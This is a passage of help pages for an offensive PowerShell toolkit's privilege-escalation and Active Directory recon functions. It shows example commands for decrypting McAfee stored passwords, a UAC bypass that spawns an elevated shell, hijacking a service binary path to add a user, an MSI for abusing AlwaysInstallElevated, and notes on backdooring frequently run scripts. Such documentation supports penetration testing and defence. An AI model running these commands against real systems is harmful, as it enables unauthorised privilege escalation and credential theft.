21 | For any files found, the appropriate
22 | credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
23 | function that takes advantage of McAfee's static key encryption.
24 | Any decrypted credentials
25 | are output in custom objects.
26 | See links for more information.
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | Get-SiteListPassword
33 | ```
34 |
35 | EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
36 | UserName :
37 | Path : Products/CommonUpdater
38 | Name : McAfeeHttp
39 | DecPassword : MyStrongPassword!
40 | Enabled : 1
41 | DomainName :
42 | Server : update.nai.com:80
43 |
44 | EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
45 | UserName : McAfeeService
46 | Path : Repository$
47 | Name : Paris
48 | DecPassword : MyStrongPassword!
49 | Enabled : 1
50 | DomainName : companydomain
51 | Server : paris001
52 |
53 | EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
54 | UserName : McAfeeService
55 | Path : Repository$
56 | Name : Tokyo
57 | DecPassword : MyStrongPassword!
58 | Enabled : 1
59 | DomainName : companydomain
60 | Server : tokyo000
61 |
62 | ## PARAMETERS
63 |
64 | ### -Path
65 | Optional path to a SiteList.xml file or folder.
66 |
67 | ```yaml
68 | Type: String[]
69 | Parameter Sets: (All)
70 | Aliases:
71 |
72 | Required: False
73 | Position: 1
74 | Default value: None
75 | Accept pipeline input: True (ByValue)
76 | Accept wildcard characters: False
77 | ```
78 |
79 | ## INPUTS
80 |
81 | ## OUTPUTS
82 |
83 | ### PowerUp.SiteListPassword
84 |
85 | ## NOTES
86 |
87 | ## RELATED LINKS
88 |
89 | [https://github.com/funoverip/mcafee-sitelist-pwd-decryption/](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/)
90 | [https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/](https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/)
91 | [https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md](https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md)
92 | [https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)
96 |
97 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-UnattendedInstallFile.md:
--------------------------------------------------------------------------------
1 | # Get-UnattendedInstallFile
2 |
3 | ## SYNOPSIS
4 | Checks several locations for remaining unattended installation files,
5 | which may have deployment credentials.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnattendedInstallFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | {{Fill in the Description}}
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-UnattendedInstallFile
25 | ```
26 |
27 | Finds any remaining unattended installation files.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.UnattendedInstallFile
36 |
37 | Custom PSObject containing results.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)
44 |
45 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-UnquotedService.md:
--------------------------------------------------------------------------------
1 | # Get-UnquotedService
2 |
3 | ## SYNOPSIS
4 | Returns the name and binary path for services whose binary path is unquoted
5 | and contains a space.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnquotedService
15 | ```
16 |
17 | ## DESCRIPTION
18 | Uses Get-WmiObject to query all win32_service objects and extract
19 | the binary pathname for each.
20 | Then checks whether any binary path contains a space
21 | and is not quoted.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-UnquotedService
28 | ```
29 |
30 | Get a set of potentially exploitable services.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.UnquotedService
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Invoke-PrivescAudit.md:
--------------------------------------------------------------------------------
1 | # Invoke-PrivescAudit
2 |
3 | ## SYNOPSIS
4 | Executes all functions that check for various Windows privilege escalation opportunities.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-PrivescAudit [-HTMLReport]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Executes all functions that check for various Windows privilege escalation opportunities.
18 |
19 | ## EXAMPLES
20 |
21 | ### -------------------------- EXAMPLE 1 --------------------------
22 | ```
23 | Invoke-PrivescAudit
24 | ```
25 |
26 | Runs all escalation checks and outputs a status report for discovered issues.
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Invoke-PrivescAudit -HTMLReport
31 | ```
32 |
33 | Runs all escalation checks and outputs a status report to SYSTEM.username.html
34 | detailing any discovered issues.
35 |
36 | ## PARAMETERS
37 |
38 | ### -HTMLReport
39 | Switch.
40 | Write an HTML version of the report to SYSTEM.username.html.
41 |
42 | ```yaml
43 | Type: SwitchParameter
44 | Parameter Sets: (All)
45 | Aliases:
46 |
47 | Required: False
48 | Position: Named
49 | Default value: False
50 | Accept pipeline input: False
51 | Accept wildcard characters: False
52 | ```
53 |
54 | ## INPUTS
55 |
56 | ## OUTPUTS
57 |
58 | ### System.String
59 |
60 | ## NOTES
61 |
62 | ## RELATED LINKS
63 |
64 |
--------------------------------------------------------------------------------
/docs/Privesc/Invoke-WScriptUACBypass.md:
--------------------------------------------------------------------------------
1 | # Invoke-WScriptUACBypass
2 |
3 | ## SYNOPSIS
4 | Performs the UAC bypass attack by abusing the lack of an embedded manifest in wscript.exe.
5 |
6 | Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-WScriptUACBypass [-Command] [-WindowStyle ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute
18 | VBScript using the wscript executable with the new manifest.
19 | The VBScript executed by
20 | C:\Windows\wscript.exe will run elevated.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | "
27 | ```
28 |
29 | Launches the specified PowerShell encoded command in high-integrity.
30 |
31 | ### -------------------------- EXAMPLE 2 --------------------------
32 | ```
33 | Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'
34 | ```
35 |
36 | Spawns a high integrity cmd.exe.
37 |
38 | ## PARAMETERS
39 |
40 | ### -Command
41 | The shell command you want wscript.exe to run elevated.
42 |
43 | ```yaml
44 | Type: String
45 | Parameter Sets: (All)
46 | Aliases: CMD
47 |
48 | Required: True
49 | Position: 1
50 | Default value: None
51 | Accept pipeline input: True (ByPropertyName, ByValue)
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ### -WindowStyle
56 | Whether to display or hide the window for the executed '-Command X'.
57 | Accepted values are 'Hidden' and 'Normal'/'Visible'.
58 | Default is 'Hidden'.
59 |
60 | ```yaml
61 | Type: String
62 | Parameter Sets: (All)
63 | Aliases:
64 |
65 | Required: False
66 | Position: Named
67 | Default value: Hidden
68 | Accept pipeline input: False
69 | Accept wildcard characters: False
70 | ```
71 |
72 | ## INPUTS
73 |
74 | ## OUTPUTS
75 |
76 | ## NOTES
77 |
78 | ## RELATED LINKS
79 |
80 | [http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html)
81 | [https://github.com/Vozzie/uacscript](https://github.com/Vozzie/uacscript)
82 | [https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)
85 |
86 |
--------------------------------------------------------------------------------
/docs/Privesc/Restore-ServiceBinary.md:
--------------------------------------------------------------------------------
1 | # Restore-ServiceBinary
2 |
3 | ## SYNOPSIS
4 | Restores a service binary backed up by Install-ServiceBinary.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-ServiceDetail, Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Restore-ServiceBinary [-Name] [[-BackupPath] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
18 | checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
19 | binary location.
20 | If it exists, the backup binary is restored to the original
21 | binary path.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Restore-ServiceBinary -Name VulnSVC
28 | ```
29 |
30 | Restore the original binary for the service 'VulnSVC'.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service VulnSVC | Restore-ServiceBinary
35 | ```
36 |
37 | Restore the original binary for the service 'VulnSVC'.
38 |
39 | ### -------------------------- EXAMPLE 3 --------------------------
40 | ```
41 | Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
42 | ```
43 |
44 | Restore the original binary for the service 'VulnSVC' from a custom location.
45 |
46 | ## PARAMETERS
47 |
48 | ### -Name
49 | The service name to restore a binary for.
50 |
51 | ```yaml
52 | Type: String
53 | Parameter Sets: (All)
54 | Aliases: ServiceName
55 |
56 | Required: True
57 | Position: 1
58 | Default value: None
59 | Accept pipeline input: True (ByPropertyName, ByValue)
60 | Accept wildcard characters: False
61 | ```
62 |
63 | ### -BackupPath
64 | Optional manual path to the backup binary.
65 |
66 | ```yaml
67 | Type: String
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: 2
73 | Default value: None
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ## INPUTS
79 |
80 | ## OUTPUTS
81 |
82 | ### PowerUp.ServiceBinary.Installed
83 |
84 | ## NOTES
85 |
86 | ## RELATED LINKS
87 |
88 |
--------------------------------------------------------------------------------
/docs/Privesc/Set-ServiceBinaryPath.md:
--------------------------------------------------------------------------------
1 | # Set-ServiceBinaryPath
2 |
3 | ## SYNOPSIS
4 | Sets the binary path for a service to a specified value.
5 |
6 | Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Set-ServiceBinaryPath [-Name] [-Path]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens a
18 | service handle to the service with ConfigControl access using the GetServiceHandle
19 | Win32 API call.
20 | ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
21 | to the string value specified by -Path, and the handle is then closed.
22 |
23 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
24 | Dacl field to each object.
25 | It does this by opening a handle with ReadControl for the
26 | service with using the GetServiceHandle Win32 API call and then uses
27 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
28 |
29 | ## EXAMPLES
30 |
31 | ### -------------------------- EXAMPLE 1 --------------------------
32 | ```
33 | Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
34 | ```
35 |
36 | Sets the binary path for 'VulnSvc' to be a command to add a user.
37 |
38 | ### -------------------------- EXAMPLE 2 --------------------------
39 | ```
40 | Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
41 | ```
42 |
43 | Sets the binary path for 'VulnSvc' to be a command to add a user.
44 |
45 | ## PARAMETERS
46 |
47 | ### -Name
48 | An array of one or more service names to set the binary path for.
49 | Required.
50 |
51 | ```yaml
52 | Type: String[]
53 | Parameter Sets: (All)
54 | Aliases: ServiceName
55 |
56 | Required: True
57 | Position: 1
58 | Default value: None
59 | Accept pipeline input: True (ByPropertyName, ByValue)
60 | Accept wildcard characters: False
61 | ```
62 |
63 | ### -Path
64 | The new binary path (lpBinaryPathName) to set for the specified service.
65 | Required.
66 |
67 | ```yaml
68 | Type: String
69 | Parameter Sets: (All)
70 | Aliases: BinaryPath, binPath
71 |
72 | Required: True
73 | Position: 2
74 | Default value: None
75 | Accept pipeline input: False
76 | Accept wildcard characters: False
77 | ```
78 |
79 | ## INPUTS
80 |
81 | ## OUTPUTS
82 |
83 | ### System.Boolean
84 |
85 | $True if configuration succeeds, $False otherwise.
86 |
87 | ## NOTES
88 |
89 | ## RELATED LINKS
90 |
91 | [https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx)
92 |
93 |
--------------------------------------------------------------------------------
/docs/Privesc/Write-UserAddMSI.md:
--------------------------------------------------------------------------------
1 | # Write-UserAddMSI
2 |
3 | ## SYNOPSIS
4 | Writes out a precompiled MSI installer that prompts for a user/group addition.
5 | This function can be used to abuse Get-RegistryAlwaysInstallElevated.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Write-UserAddMSI [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Writes out a precompiled MSI installer that prompts for a user/group addition.
19 | This function can be used to abuse Get-RegistryAlwaysInstallElevated.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Write-UserAddMSI
26 | ```
27 |
28 | Writes the user add MSI to the local directory.
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | Specifies the output path for the MSI file. Defaults to UserAdd.msi in the local directory.
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases: ServiceName
39 |
40 | Required: False
41 | Position: 1
42 | Default value: UserAdd.msi
43 | Accept pipeline input: True (ByPropertyName, ByValue)
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ### PowerUp.UserAddMSI
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/docs/Recon/ConvertTo-SID.md:
--------------------------------------------------------------------------------
1 | # ConvertTo-SID
2 |
3 | ## SYNOPSIS
4 | Converts a given user/group name to a security identifier (SID).
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | ConvertTo-SID [-ObjectName] [[-Domain] ] [[-Server] ] [[-Credential] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Converts a "DOMAIN\username" syntax to a security identifier (SID)
18 | using System.Security.Principal.NTAccount's translate function.
19 | If alternate credentials are supplied, then Get-ADObject is used to try
20 | to map the name to a security identifier.
21 |
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | ConvertTo-SID 'DEV\dfm'
28 | ```
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | 'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
33 | ```
34 |
35 | ### -------------------------- EXAMPLE 3 --------------------------
36 | ```
37 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
38 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
39 | 'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
40 | ```
41 |
42 |
43 | ## PARAMETERS
44 |
45 | ### -ObjectName
46 | The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
47 |
48 | ```yaml
49 | Type: String[]
50 | Parameter Sets: (All)
51 | Aliases: Name, Identity
52 |
53 | Required: True
54 | Position: 1
55 | Default value: None
56 | Accept pipeline input: True (ByPropertyName, ByValue)
57 | Accept wildcard characters: False
58 | ```
59 |
60 | ### -Domain
61 | Specifies the domain to use for the translation, defaults to the current domain.
62 |
63 | ```yaml
64 | Type: String
65 | Parameter Sets: (All)
66 | Aliases:
67 |
68 | Required: False
69 | Position: 2
70 | Default value: None
71 | Accept pipeline input: False
72 | Accept wildcard characters: False
73 | ```
74 |
75 | ### -Server
76 | Specifies an Active Directory server (domain controller) to bind to for the translation.
77 |
78 | ```yaml
79 | Type: String
80 | Parameter Sets: (All)
81 | Aliases: DomainController
82 |
83 | Required: False
84 | Position: 3
85 | Default value: None
86 | Accept pipeline input: False
87 | Accept wildcard characters: False
88 | ```
89 |
90 | ### -Credential
91 | Specifies an alternate credential to use for the translation.
92 |
93 | ```yaml
94 | Type: PSCredential
95 | Parameter Sets: (All)
96 | Aliases:
97 |
98 | Required: False
99 | Position: 4
100 | Default value: [Management.Automation.PSCredential]::Empty
101 | Accept pipeline input: False
102 | Accept wildcard characters: False
103 | ```
104 |
105 | ## INPUTS
106 |
107 | ### String
108 |
109 | Accepts one or more username specification strings on the pipeline.
110 |
111 | ## OUTPUTS
112 |
113 | ### String
114 |
115 | A string representing the SID of the translated name.
116 |
117 | ## NOTES
118 |
119 | ## RELATED LINKS
120 |
121 |
--------------------------------------------------------------------------------
/docs/Recon/Export-PowerViewCSV.md:
--------------------------------------------------------------------------------
1 | # Export-PowerViewCSV
2 |
3 | ## SYNOPSIS
4 | Converts objects into a series of comma-separated (CSV) strings and saves the
5 | strings in a CSV file in a thread-safe manner.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Export-PowerViewCSV -InputObject [-Path] [[-Delimiter] ] [-Append]
15 | ```
16 |
17 | ## DESCRIPTION
18 | This helper exports an -InputObject to a .csv in a thread-safe manner
19 | using a mutex, so that the various multi-threaded functions in
20 | PowerView have a thread-safe way to export output to the same file.
21 | Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
22 |
23 |
24 | Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
25 |
26 | ## EXAMPLES
27 |
28 | ### -------------------------- EXAMPLE 1 --------------------------
29 | ```
30 | Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
31 | ```
32 |
33 | ### -------------------------- EXAMPLE 2 --------------------------
34 | ```
35 | Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
36 | ```
37 |
38 | ## PARAMETERS
39 |
40 | ### -InputObject
41 | Specifies the objects to export as CSV strings.
42 |
43 | ```yaml
44 | Type: PSObject[]
45 | Parameter Sets: (All)
46 | Aliases:
47 |
48 | Required: True
49 | Position: Named
50 | Default value: None
51 | Accept pipeline input: True (ByPropertyName, ByValue)
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ### -Path
56 | Specifies the path to the CSV output file.
57 |
58 | ```yaml
59 | Type: String
60 | Parameter Sets: (All)
61 | Aliases:
62 |
63 | Required: True
64 | Position: 2
65 | Default value: None
66 | Accept pipeline input: False
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Delimiter
71 | Specifies a delimiter to separate the property values.
72 | The default is a comma (,).
73 |
74 | ```yaml
75 | Type: Char
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: 3
81 | Default value: ,
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ### -Append
87 | Indicates that this cmdlet adds the CSV output to the end of the specified file.
88 | Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
89 |
90 | ```yaml
91 | Type: SwitchParameter
92 | Parameter Sets: (All)
93 | Aliases:
94 |
95 | Required: False
96 | Position: Named
97 | Default value: False
98 | Accept pipeline input: False
99 | Accept wildcard characters: False
100 | ```
101 |
102 | ## INPUTS
103 |
104 | ### PSObject
105 |
106 | Accepts one or more PSObjects on the pipeline.
107 |
108 | ## OUTPUTS
109 |
110 | ## NOTES
111 |
112 | ## RELATED LINKS
113 |
114 | [http://poshcode.org/1590](http://poshcode.org/1590)
115 | [http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)
116 |
117 |
118 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ComputerDetail.md:
--------------------------------------------------------------------------------
1 | # Get-ComputerDetail
2 |
3 | ## SYNOPSIS
4 | This script is used to get useful information from a computer.
5 |
6 | Function: Get-ComputerDetail
7 | Author: Joe Bialek, Twitter: @JosephBialek
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ComputerDetail [-ToString]
15 | ```
16 |
17 | ## DESCRIPTION
18 | This script is used to get useful information from a computer.
19 | Currently, the script gets the following information:
20 | - Explicit Credential Logons (Event ID 4648)
21 | - Logon events (Event ID 4624)
22 | - AppLocker logs to find what processes are created
23 | - PowerShell logs to find PowerShell scripts which have been executed
24 | - RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
25 |
26 | ## EXAMPLES
27 |
28 | ### -------------------------- EXAMPLE 1 --------------------------
29 | ```
30 | Get-ComputerDetail
31 | ```
32 |
33 | Gets information about the computer and outputs it as PowerShell objects.
34 |
35 | `Get-ComputerDetail -ToString`
36 | Gets information about the computer and outputs it as raw text.
37 |
38 | ## PARAMETERS
39 |
40 | ### -ToString
41 | Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
42 |
43 | ```yaml
44 | Type: SwitchParameter
45 | Parameter Sets: (All)
46 | Aliases:
47 |
48 | Required: False
49 | Position: 1
50 | Default value: False
51 | Accept pipeline input: False
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ## INPUTS
56 |
57 | ## OUTPUTS
58 |
59 | ## NOTES
60 | This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
61 | You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
62 |
63 | ## RELATED LINKS
64 |
65 | Blog: [http://clymb3r.wordpress.com/](http://clymb3r.wordpress.com/)
66 | Github repo: [https://github.com/clymb3r/PowerShell](https://github.com/clymb3r/PowerShell)
67 |
68 |
69 |
--------------------------------------------------------------------------------
/docs/Recon/Get-Domain.md:
--------------------------------------------------------------------------------
1 | # Get-Domain
2 |
3 | ## SYNOPSIS
4 | Returns the domain object for the current (or specified) domain.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-Domain [[-Domain] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
18 | domain or the domain specified with -Domain X.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-Domain -Domain testlab.local
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
30 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
31 | Get-Domain -Credential $Cred
32 | ```
33 |
34 |
35 | ## PARAMETERS
36 |
37 | ### -Domain
38 | Specifies the domain name to query for, defaults to the current domain.
39 |
40 | ```yaml
41 | Type: String
42 | Parameter Sets: (All)
43 | Aliases:
44 |
45 | Required: False
46 | Position: 1
47 | Default value: None
48 | Accept pipeline input: True (ByValue)
49 | Accept wildcard characters: False
50 | ```
51 |
52 | ### -Credential
53 | A \[Management.Automation.PSCredential\] object of alternate credentials
54 | for connection to the target domain.
55 |
56 | ```yaml
57 | Type: PSCredential
58 | Parameter Sets: (All)
59 | Aliases:
60 |
61 | Required: False
62 | Position: Named
63 | Default value: [Management.Automation.PSCredential]::Empty
64 | Accept pipeline input: False
65 | Accept wildcard characters: False
66 | ```
67 |
68 | ## INPUTS
69 |
70 | ## OUTPUTS
71 |
72 | ### System.DirectoryServices.ActiveDirectory.Domain
73 |
74 | A complex .NET domain object.
75 |
76 | ## NOTES
77 |
78 | ## RELATED LINKS
79 |
80 | [http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)
81 |
82 |
--------------------------------------------------------------------------------
/docs/Recon/Get-DomainSID.md:
--------------------------------------------------------------------------------
1 | # Get-DomainSID
2 |
3 | ## SYNOPSIS
4 | Returns the SID for the current domain or the specified domain.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-DomainComputer
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns the SID for the current domain or the specified domain by executing
18 | Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
19 | to search for domain controllers through LDAP.
20 | The SID of the returned domain controller is then extracted.
21 |
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-DomainSID
28 | ```
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-DomainSID -Domain testlab.local
33 | ```
34 |
35 | ### -------------------------- EXAMPLE 3 --------------------------
36 | ```
37 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
38 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
39 | Get-DomainSID -Credential $Cred
40 | ```
41 |
42 |
43 | ## PARAMETERS
44 |
45 | ### -Domain
46 | Specifies the domain to use for the query, defaults to the current domain.
47 |
48 | ```yaml
49 | Type: String
50 | Parameter Sets: (All)
51 | Aliases:
52 |
53 | Required: False
54 | Position: 1
55 | Default value: None
56 | Accept pipeline input: False
57 | Accept wildcard characters: False
58 | ```
59 |
60 | ### -Server
61 | Specifies an Active Directory server (domain controller) to bind to.
62 |
63 | ```yaml
64 | Type: String
65 | Parameter Sets: (All)
66 | Aliases: DomainController
67 |
68 | Required: False
69 | Position: 2
70 | Default value: None
71 | Accept pipeline input: False
72 | Accept wildcard characters: False
73 | ```
74 |
75 | ### -Credential
76 | A \[Management.Automation.PSCredential\] object of alternate credentials
77 | for connection to the target domain.
78 |
79 | ```yaml
80 | Type: PSCredential
81 | Parameter Sets: (All)
82 | Aliases:
83 |
84 | Required: False
85 | Position: 3
86 | Default value: [Management.Automation.PSCredential]::Empty
87 | Accept pipeline input: False
88 | Accept wildcard characters: False
89 | ```
90 |
91 | ## INPUTS
92 |
93 | ## OUTPUTS
94 |
95 | ### String
96 |
97 | A string representing the specified domain SID.
98 |
99 | ## NOTES
100 |
101 | ## RELATED LINKS
102 |
103 |
--------------------------------------------------------------------------------
/docs/Recon/Get-Forest.md:
--------------------------------------------------------------------------------
1 | # Get-Forest
2 |
3 | ## SYNOPSIS
4 | Returns the forest object for the current (or specified) forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: ConvertTo-SID
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-Forest [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
18 | forest or the forest specified with -Forest X.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-Forest -Forest external.domain
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
30 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
31 | Get-Forest -Credential $Cred
32 | ```
33 |
34 |
35 | ## PARAMETERS
36 |
37 | ### -Forest
38 | The forest name to query for, defaults to the current forest.
39 |
40 | ```yaml
41 | Type: String
42 | Parameter Sets: (All)
43 | Aliases:
44 |
45 | Required: False
46 | Position: 1
47 | Default value: None
48 | Accept pipeline input: True (ByValue)
49 | Accept wildcard characters: False
50 | ```
51 |
52 | ### -Credential
53 | A \[Management.Automation.PSCredential\] object of alternate credentials
54 | for connection to the target forest.
55 |
56 | ```yaml
57 | Type: PSCredential
58 | Parameter Sets: (All)
59 | Aliases:
60 |
